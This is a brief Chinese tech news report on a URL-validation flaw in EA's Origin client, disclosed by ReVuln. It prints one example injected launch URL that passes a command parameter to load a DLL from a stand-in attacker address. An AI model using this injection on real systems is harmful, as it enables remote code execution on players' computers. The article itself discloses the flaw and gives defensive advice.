EA公司想在游戏数字下载平台与Steam分庭抗礼,于是成立了Origin平台,两家相互竞争,开启了数字下载平台的百花齐放。根据计算机安全公司ReVuln去年曝光了Steam平台存在URL地址访问安全漏洞,如今曝光了EA的Origin平台同样具有类似的问题。据悉Origin平台的URL验证机制存在漏洞,黑客可以利用这一漏洞推送假冒URL链接来向玩家计算机中安装恶意程序。
玩家在试图通过Origin启动游戏时,客户端会先向服务器请求一个用来启动游戏的URL地址,比如:origin://LaunchGame/[GameID],而如果该地址被黑客拦截并替换成包含有不良内容的加链接,比如:origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll,那么一旦玩家执行启动游戏操作时便会导致自己的计算机遭遇安全风险。
不过,研究人员也表示,虽然Origin平台自身具有这样的安全机制缺陷,但黑客想要通过这种方式对用户发起攻击也并非易于反掌,因为目前大多浏览器产品都具有非法URL过滤拦截功能,所以为了确保计算机的安全,用户一定要保证打开相关的浏览器安全功能,并且安装有最新版的防病毒软件,同时拒绝访问那些不熟悉的URL地址。